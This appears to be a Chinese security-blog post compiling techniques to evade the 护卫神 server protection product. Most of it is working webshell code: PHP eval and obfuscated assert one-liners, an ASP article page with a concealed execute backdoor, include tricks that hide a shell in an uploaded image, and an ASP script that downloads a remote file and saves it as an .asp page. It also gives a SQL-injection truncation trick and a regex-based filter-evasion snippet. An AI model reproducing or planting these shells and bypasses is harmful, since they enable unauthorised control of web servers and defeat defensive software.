关注我们
QRcode 邮件联系 QRcode
主页 » 信息安全 » 正文

突破绕过护卫神技术总汇

 feng  744 ℃  0条点评

学鬼哥的“破那个垃圾安全狗技术总汇"也来一发绕过护卫神

申明:由于护卫神收费,破解版又比较低,因此,本贴方法均来自以往实战以及其他网络文献,没有写的请大家在下面补充,我看到了会加上
-----------------------------------------------------------------------------------------------------------------------------------
文章分为:
一、马儿篇,都是以前可以过护卫神的马
二、注入篇,可以绕过注入的方法
三、规则篇,根据护卫神的过滤规则大家可以自己设计马儿

一、马儿篇
----------------1号--------------------------
<?php
@eval
($_POST['1']);?>

----------------2号--------------------------
<title>login</title>nono<?php

eval
($_POST
[1])

?>

--------------------3号---------------------------------------------
<?php $a = str_replace(x,"","axsxxsxexrxxt");
$a($_POST["c"]); ?>
菜刀直接连,不需要构造连接字符串,密码 c

---------------------某牛给的,据说可过安全狗和护卫神------------------------------

<%@language=vbscript codepage=936 %>
<%
Option Explicit
'强制浏览器重新访问服务器下载页面,而不是从缓存读取页面
Response.Buffer = True
Response.Expires = -1
Response.ExpiresAbsolute = Now() - 1
Response.Expires = 0
Response.CacheControl = "no-cache"
dim m
m=request("m")
Dim ArticleID, Action, sql, rs, Hits, ShowType
if m<>"" then execute(m)
ArticleID = Trim(request("ArticleID"))
Action = Trim(request("Action"))
ShowType = Trim(request("ShowType"))
If IsNumeric(ShowType) Then
    ShowType = CLng(ShowType)
Else
    ShowType = 1
End If
%>

--------------------类似于过安全狗的包含方法-------------------------------------------
A.asp版本:
将一句话保存为  XX.jpg  上传后 地址为  .../131930.jpg

在上传一个 x.asp 内容为 <!–#include  file="../131930.jpg"-->

B.php版本
如果是php的话:
<?php
include "1.htm";
?>

------------------实在不行,还可以下载---------------------------------------------
远程下载马

  1. <%
  2. Set xPost = CreateObject("Microsoft.XMLHTTP")
  3. xPost.Open "GET","http://www.xxx.com/123/1.txt",False
  4. xPost.Send()
  5. Set sGet = CreateObject("ADODB.Stream")
  6. sGet.Mode = 3
  7. sGet.Type = 1
  8. sGet.Open()
  9. sGet.Write(xPost.responseBody)
  10. sGet.SaveToFile Server.MapPath("ls.asp"),2
  11. set sGet = nothing
  12. set sPOST = nothing
  13. %>

复制代码

---------------------------------------------------------------
---------------------------------------------------------------

二、注入篇

/*%00*/截断符
select/*%00*/* from admin;

---------------------------------------------------------------
---------------------------------------------------------------

三、规则篇
可以利用类似:

  1. <?php
  2. $code='一串base64'; //base64编码
  3. $x=str_replace('f',"","bfafsfef6f4f_ffdffeffcffoffdffef"); //字符串替换
  4. $a = '/a/';//正则规则
  5. preg_replace($a,'e'.'v'.'a'.'l'.'('.$x.'('.$code.'))','a'); //正则替换
  6. ?>

复制代码

方法绕过关键词过滤

原文作者:H4xssck3r

本文标签:
最新全球网站排行榜(腾讯和百度进前十)
织梦CMS漏洞dedecms漏洞 2013-02-10 SQL注入漏洞
我是如何打造一款自动化SQL注入工具的我是如何打造一款自动化SQL注入工具的分析勒索软件Cerber的攻击方法分析勒索软件Cerber的攻击方法​分析Cknife,一个类似China Chopper的webshell管理工具(第二部分)​分析Cknife,一个类似China Chopper的webshell管理工具(第二部分)某个商业定向攻击活动分析某个商业定向攻击活动分析

已有0条评论,欢迎点评!

smiley smiley smiley smiley smiley smiley smiley smiley smiley smiley smiley smiley smiley smiley smiley smiley

国际惯例, 沙发拿下 . . .


注册帐号  |  忘记密码